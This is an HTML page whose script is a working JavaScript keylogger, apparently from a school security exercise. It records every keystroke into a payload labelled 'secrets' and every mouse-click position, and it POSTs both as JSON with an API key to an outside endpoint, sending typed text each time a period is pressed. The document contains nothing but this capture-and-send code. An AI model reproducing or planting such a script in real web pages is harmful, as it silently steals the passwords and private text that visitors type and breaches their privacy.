<body>
    keylogger
</body>

<script>
    keyPayload = {
        "keyword": "secrets",
        "payload": ""
    };

    mousePayload = {
        "keyword": "mouse click",
        "payload": ""
    };

    document.addEventListener("keydown", function(event) {
        
        if (8 == event.keyCode) {
            keyPayload.payload = keyPayload.payload.slice(0, -1)
        }
        
        if (16 != event.keyCode && 13 != event.keyCode && 8 != event.keyCode) {
            var key;

            if (190 == event.keyCode)
            {
                key = ".";
            }else{
                if (event.shiftKey) {
                    key = String.fromCharCode(event.keyCode);
                } else {
                    key = String.fromCharCode(event.keyCode).toLowerCase();
                }
            }
        
            keyPayload.payload  += key;

            if (190 == event.keyCode) {
                fetch('https://m183.gibz-informatik.ch/api/keylogger', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'X-Api-Key': 'MQA1ADQAMwAwADMANgA0ADIAOAAzADgANwA4ADgANgAxADkA',
                    },
                    body: JSON.stringify(keyPayload),
                });

                keyPayload.payload = "";
            }
        }
    });

    document.addEventListener('mousedown', event => {
        x = event.offsetX;
        y = event.offsetY;
        
        mousePayload.payload = "X-Pos: " + x + " Y-Pos: " + y;

        fetch('https://m183.gibz-informatik.ch/api/keylogger', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                        'X-Api-Key': 'MQA1ADQAMwAwADMANgA0ADIAOAAzADgANwA4ADgANgAxADkA',
                    },
                    body: JSON.stringify(mousePayload),
                });
    });
    

</script>